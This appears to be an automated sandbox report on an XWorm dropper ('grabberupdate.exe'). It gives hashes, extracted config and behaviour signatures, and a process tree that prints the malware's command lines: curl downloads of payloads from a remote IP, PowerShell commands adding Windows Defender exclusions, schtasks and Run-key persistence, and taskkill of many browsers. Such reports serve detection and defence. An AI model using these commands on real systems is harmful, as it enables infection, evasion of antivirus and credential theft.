Analysis
- max time kernel: 286s
- max time network: 303s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 22/05/2024, 21:27
Static task: static1
Behavioral task: behavioral1
Sample: grabberupdate.exe
Resource: win10v2004-20240226-en
General
- Target: grabberupdate.exe
- Size: 87KB
- MD5: ab378d6539627c52dbfc272c83eb420c
- SHA1: 039060f0fdefbe0a62147a7bbad9b1a526a78d61
- SHA256: 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
- SHA512: afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
- SSDEEP: 1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
Extracted: xworm
- Install_directory: %AppData%
- install_file: wlms.exe
- pastebin_url: https://pastebin.com/raw/Xuc6dzua
Signatures
- Detect Xworm Payload (4 IoCs)
  resource / yara_rule:
  - behavioral1/files/0x0006000000000500-4.dat: family_xworm
  - behavioral1/memory/3140-7-0x0000000000170000-0x0000000000186000-memory.dmp: family_xworm
  - behavioral1/files/0x00040000000163e4-91.dat: family_xworm
  - behavioral1/memory/3488-95-0x0000000000490000-0x00000000004A6000-memory.dmp: family_xworm
- Command and Scripting Interpreter: PowerShell (1 TTP, 8 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
  pid / Process:
  - 208 powershell.exe
  - 3776 powershell.exe
  - 4604 powershell.exe
  - 4292 powershell.exe
  - 32 powershell.exe
  - 1860 powershell.exe
  - 1444 powershell.exe
  - 1712 powershell.exe
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 7 IoCs)
  Looks up the country code configured in the registry, likely for geofencing.
  description / ioc / Process:
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (grabberupdate.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (grabberupdate.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (grabber.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (grabber.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (rm.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (grabberupdate.exe)
  - Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation (wlms.exe)
- Executes dropped EXE (15 IoCs)
  pid / Process:
  - 3140 wlms.exe
  - 4780 grabber.exe
  - 1712 grabber.exe
  - 2220 wlms.exe
  - 2184 ram.exe
  - 3488 rm.exe
  - 1104 wlms.exe
  - 3328 rm.exe
  - 544 wlms.exe
  - 2392 wlms.exe
  - 4092 winlogon.exe
  - 3576 winlogon.exe
  - 3344 wlms.exe
  - 2304 winlogon.exe
  - 1012 wlms.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.
- Adds Run key to start application (2 TTPs, 2 IoCs)
  description / ioc / Process:
  - Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wlms = "C:\\Users\\Admin\\AppData\\Roaming\\wlms.exe" (wlms.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "C:\\ProgramData\\winlogon.exe" (rm.exe)
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
  flow / ioc:
  - 64 pastebin.com
  - 85 pastebin.com
  - 63 pastebin.com
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc:
  - 60 ip-api.com
  - 83 ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process:
  - 1960 schtasks.exe
  - 4896 schtasks.exe
- Kills process with taskkill (15 IoCs)
  pid / Process:
  - 1812 taskkill.exe
  - 4492 taskkill.exe
  - 1088 taskkill.exe
  - 4724 taskkill.exe
  - 2204 taskkill.exe
  - 1988 taskkill.exe
  - 380 taskkill.exe
  - 3488 taskkill.exe
  - 4656 taskkill.exe
  - 2204 taskkill.exe
  - 3292 taskkill.exe
  - 5016 taskkill.exe
  - 3440 taskkill.exe
  - 2900 taskkill.exe
  - 1988 taskkill.exe
- Suspicious behavior: EnumeratesProcesses (24 IoCs)
  pid / Process (a pid is listed once per event):
  - 32 powershell.exe (3 events)
  - 1860 powershell.exe (3 events)
  - 1444 powershell.exe (3 events)
  - 1712 powershell.exe (3 events)
  - 3140 wlms.exe (2 events)
  - 208 powershell.exe (3 events)
  - 3776 powershell.exe (2 events)
  - 4604 powershell.exe (2 events)
  - 4292 powershell.exe (2 events)
  - 3488 rm.exe (1 event)
- Suspicious use of AdjustPrivilegeToken (36 IoCs)
  description / pid / Process (every entry is Token: SeDebugPrivilege):
  - 3140 wlms.exe
  - 32 powershell.exe
  - 1860 powershell.exe
  - 1444 powershell.exe
  - 1712 powershell.exe
  - 2220 wlms.exe
  - 3292 taskkill.exe
  - 1812 taskkill.exe
  - 2204 taskkill.exe
  - 1988 taskkill.exe
  - 380 taskkill.exe
  - 3488 taskkill.exe
  - 4492 taskkill.exe
  - 5016 taskkill.exe
  - 3440 taskkill.exe
  - 4656 taskkill.exe
  - 2900 taskkill.exe
  - 1088 taskkill.exe
  - 4724 taskkill.exe
  - 2204 taskkill.exe
  - 1988 taskkill.exe
  - 3488 rm.exe
  - 1104 wlms.exe
  - 208 powershell.exe
  - 3776 powershell.exe
  - 544 wlms.exe
  - 3328 rm.exe
  - 4604 powershell.exe
  - 4292 powershell.exe
  - 3488 rm.exe
  - 2392 wlms.exe
  - 4092 winlogon.exe
  - 3576 winlogon.exe
  - 3344 wlms.exe
  - 2304 winlogon.exe
  - 1012 wlms.exe
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid / Process:
  - 3140 wlms.exe
  - 3488 rm.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  pid / Process -> target pid (procid_target); each pair below is recorded twice in the report, giving the 64 entries:
  - 4076 grabberupdate.exe -> 4896 (93)
  - 4896 cmd.exe -> 208 (96)
  - 4896 cmd.exe -> 2976 (109)
  - 4896 cmd.exe -> 3140 (111)
  - 3140 wlms.exe -> 32 (114)
  - 3140 wlms.exe -> 1860 (116)
  - 3140 wlms.exe -> 1444 (118)
  - 3140 wlms.exe -> 1712 (120)
  - 3140 wlms.exe -> 1960 (122)
  - 2588 grabberupdate.exe -> 4060 (126)
  - 4060 cmd.exe -> 1112 (128)
  - 4060 cmd.exe -> 4032 (129)
  - 4060 cmd.exe -> 4780 (132)
  - 1708 grabberupdate.exe -> 1608 (133)
  - 4780 grabber.exe -> 4116 (135)
  - 1608 cmd.exe -> 4368 (137)
  - 4116 cmd.exe -> 216 (138)
  - 1608 cmd.exe -> 1904 (139)
  - 1608 cmd.exe -> 1712 (140)
  - 1712 grabber.exe -> 1716 (141)
  - 1716 cmd.exe -> 4728 (143)
  - 1716 cmd.exe -> 3440 (145)
  - 4116 cmd.exe -> 1908 (147)
  - 1716 cmd.exe -> 2184 (148)
  - 2184 ram.exe -> 3292 (149)
  - 2184 ram.exe -> 1812 (150)
  - 2184 ram.exe -> 2204 (151)
  - 2184 ram.exe -> 1988 (152)
  - 2184 ram.exe -> 380 (153)
  - 2184 ram.exe -> 3488 (155)
  - 2184 ram.exe -> 4492 (156)
  - 2184 ram.exe -> 5016 (157)
- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Each entry gives the process image, its PID, the command line where it differs from the image path, and the signatures attributed to it; the bracketed number is the depth in the process tree.

- [1] C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe (PID 4076)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe (PID 4896)
    cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40AE.tmp\40BE.tmp\40BF.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\curl.exe (PID 208)
      cmdline: curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
    - [3] C:\Windows\system32\curl.exe (PID 2976)
      cmdline: curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
    - [3] C:\Users\Admin\AppData\Local\Temp\wlms.exe (PID 3140)
      cmdline: wlms.exe
      signatures: Checks computer location settings; Executes dropped EXE; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 32)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wlms.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1860)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1444)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlms.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1712)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlms.exe'
        signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\schtasks.exe (PID 1960)
        cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wlms" /tr "C:\Users\Admin\AppData\Roaming\wlms.exe"
        signatures: Creates scheduled task(s)

- [1] C:\Windows\System32\rundll32.exe (PID 5104)
  cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

- [1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5044)
  cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3956 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

- [1] C:\Users\Admin\Desktop\grabberupdate.exe (PID 2588)
  cmdline: "C:\Users\Admin\Desktop\grabberupdate.exe"
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe (PID 4060)
    cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DE1.tmp\DE2.tmp\DE3.bat C:\Users\Admin\Desktop\grabberupdate.exe"
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\curl.exe (PID 1112)
      cmdline: curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
    - [3] C:\Windows\system32\curl.exe (PID 4032)
      cmdline: curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
    - [3] C:\Users\Admin\Desktop\grabber.exe (PID 4780)
      cmdline: grabber.exe
      signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe (PID 4116)
        cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6B33.tmp\6B34.tmp\6B35.bat C:\Users\Admin\Desktop\grabber.exe"
        signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\curl.exe (PID 216)
          cmdline: curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe
        - [5] C:\Windows\system32\curl.exe (PID 1908)
          cmdline: curl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe
        - [5] C:\Users\Admin\Desktop\rm.exe (PID 3328)
          cmdline: rm.exe
          signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
    - [3] C:\Users\Admin\Desktop\wlms.exe (PID 544)
      cmdline: wlms.exe
      signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

- [1] C:\Users\Admin\Desktop\grabberupdate.exe (PID 1708)
  cmdline: "C:\Users\Admin\Desktop\grabberupdate.exe"
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe (PID 1608)
    cmdline: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6AE5.tmp\6AE6.tmp\6AE7.bat C:\Users\Admin\Desktop\grabberupdate.exe"
    signatures: Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\curl.exe (PID 4368)
      cmdline: curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
    - [3] C:\Windows\system32\curl.exe (PID 1904)
      cmdline: curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
    - [3] C:\Users\Admin\Desktop\grabber.exe (PID 1712)
      cmdline: grabber.exe
      signatures: Checks computer location settings; Executes dropped EXE; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\cmd.exe (PID 1716)
        cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\771A.tmp\771B.tmp\771C.bat C:\Users\Admin\Desktop\grabber.exe"
        signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\system32\curl.exe (PID 4728)
          cmdline: curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe
        - [5] C:\Windows\system32\curl.exe (PID 3440)
          cmdline: curl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe
        - [5] C:\Users\Admin\Desktop\ram.exe (PID 2184)
          cmdline: ram.exe
          signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
          Each taskkill.exe child below carries the signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken.
          - [6] C:\Windows\system32\taskkill.exe (PID 3292): taskkill /F /IM chrome.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 1812): taskkill /F /IM firefox.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 2204): taskkill /F /IM brave.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 1988): taskkill /F /IM opera.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 380): taskkill /F /IM kometa.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 3488): taskkill /F /IM orbitum.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 4492): taskkill /F /IM centbrowser.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 5016): taskkill /F /IM 7star.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 3440): taskkill /F /IM sputnik.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 4656): taskkill /F /IM vivaldi.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 2900): taskkill /F /IM epicprivacybrowser.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 1088): taskkill /F /IM msedge.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 4724): taskkill /F /IM uran.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 2204): taskkill /F /IM yandex.exe /T
          - [6] C:\Windows\system32\taskkill.exe (PID 1988): taskkill /F /IM iridium.exe /T
        - [5] C:\Users\Admin\Desktop\rm.exe (PID 3488)
          cmdline: rm.exe
          signatures: Checks computer location settings; Executes dropped EXE; Adds Run key to start application; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 208)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\rm.exe'
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3776)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'rm.exe'
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4604)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\winlogon.exe'
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4292)
            cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winlogon.exe'
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
          - [6] C:\Windows\System32\schtasks.exe (PID 4896)
            cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winlogon" /tr "C:\ProgramData\winlogon.exe"
            signatures: Creates scheduled task(s)
    - [3] C:\Users\Admin\Desktop\wlms.exe (PID 1104)
      cmdline: wlms.exe
      signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken

The following top-level processes are the persisted copies launched again from their install paths; each carries the signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken.
- [1] C:\Users\Admin\AppData\Roaming\wlms.exe (PID 2220)
- [1] C:\Users\Admin\AppData\Roaming\wlms.exe (PID 2392)
- [1] C:\ProgramData\winlogon.exe (PID 4092)
- [1] C:\ProgramData\winlogon.exe (PID 3576)
- [1] C:\Users\Admin\AppData\Roaming\wlms.exe (PID 3344)
- [1] C:\ProgramData\winlogon.exe (PID 2304)
- [1] C:\Users\Admin\AppData\Roaming\wlms.exe (PID 1012)
Network
MITRE ATT&CK Enterprise v15
Downloads